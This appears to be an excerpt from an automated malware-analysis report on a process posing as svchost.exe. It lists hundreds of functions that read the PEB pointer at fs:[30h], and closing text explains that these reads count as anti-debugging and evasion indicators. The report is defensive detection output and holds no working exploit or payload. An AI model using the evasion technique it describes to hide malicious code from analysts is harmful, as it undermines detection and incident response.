Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303A3C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030383C0 mov eax, dword ptr fs:[00000030h]2_2_030383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B63C0 mov eax, dword ptr fs:[00000030h]2_2_030B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D43D4 mov eax, dword ptr fs:[00000030h]2_2_030D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030403E9 mov eax, dword ptr fs:[00000030h]2_2_030403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E3F0 mov eax, dword ptr fs:[00000030h]2_2_0304E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030663FF mov eax, dword ptr fs:[00000030h]2_2_030663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302823B mov eax, dword ptr fs:[00000030h]2_2_0302823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov eax, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B8243 mov ecx, dword ptr fs:[00000030h]2_2_030B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A250 mov eax, dword ptr fs:[00000030h]2_2_0302A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036259 mov eax, dword ptr fs:[00000030h]2_2_03036259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034260 mov eax, dword ptr fs:[00000030h]2_2_03034260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302826B mov eax, dword ptr fs:[00000030h]2_2_0302826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030E0274 mov eax, dword ptr fs:[00000030h]2_2_030E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306E284 mov eax, dword ptr fs:[00000030h]2_2_0306E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B0283 mov eax, dword ptr fs:[00000030h]2_2_030B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402A0 mov eax, dword ptr fs:[00000030h]2_2_030402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov ecx, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C62A0 mov eax, dword ptr fs:[00000030h]2_2_030C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303A2C3 mov eax, dword ptr fs:[00000030h]2_2_0303A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030402E1 mov eax, dword ptr fs:[00000030h]2_2_030402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov ecx, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030DA118 mov eax, dword ptr fs:[00000030h]2_2_030DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F0115 mov eax, dword ptr fs:[00000030h]2_2_030F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060124 mov eax, dword ptr fs:[00000030h]2_2_03060124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov ecx, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C4144 mov eax, dword ptr fs:[00000030h]2_2_030C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C156 mov eax, dword ptr fs:[00000030h]2_2_0302C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C8158 mov eax, dword ptr fs:[00000030h]2_2_030C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03036154 mov eax, dword ptr fs:[00000030h]2_2_03036154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]2_2_03070185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]2_2_030EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]2_2_030D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]2_2_030B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]2_2_0302A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]2_2_030F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]2_2_030AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]2_2_031061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]2_2_030601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]2_2_030B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]2_2_030D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]2_2_0304E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]2_2_0302A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]2_2_0302C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]2_2_030C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]2_2_03032050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]2_2_030B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]2_2_0305C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]2_2_0303208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]2_2_030C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]2_2_030F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]2_2_030B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0302A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]2_2_030380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]2_2_030B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]2_2_0302C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]2_2_030720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]2_2_0306C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]2_2_03030710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]2_2_03060710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]2_2_0306C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]2_2_0306273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]2_2_030AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]2_2_0306674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]2_2_03030750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]2_2_030BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]2_2_03072750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]2_2_030B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]2_2_03038770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]2_2_03040770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]2_2_030D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]2_2_030307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]2_2_0303C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]2_2_030B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]2_2_030527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]2_2_030BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]2_2_030347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]2_2_030AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]2_2_0304260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]2_2_03072619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]2_2_0304E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]2_2_03066620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]2_2_03068620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]2_2_0303262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]2_2_0304C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]2_2_030F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]2_2_0306A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]2_2_03062674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]2_2_03034690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]2_2_0306C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]2_2_030666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]2_2_0306A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]2_2_030AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]2_2_030B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]2_2_030C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]2_2_03104500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]2_2_03040535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]2_2_0305E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]2_2_03038550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]2_2_0306656A
                Source: C:\Windows\SysWOW64\svchost.exe
                Code functions that read fs:[00000030h] (the PEB pointer in the 32-bit TEB; the PEB holds BeingDebugged, NtGlobalFlag and the loader module list, which is why these reads are counted as anti-debug / evasion indicators). One row per function and register; (xN) is the number of such reads the report lists for that function:
                Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]
                Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h] (x3)
                Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h] (x2)
                Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]
                Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h] (x2)
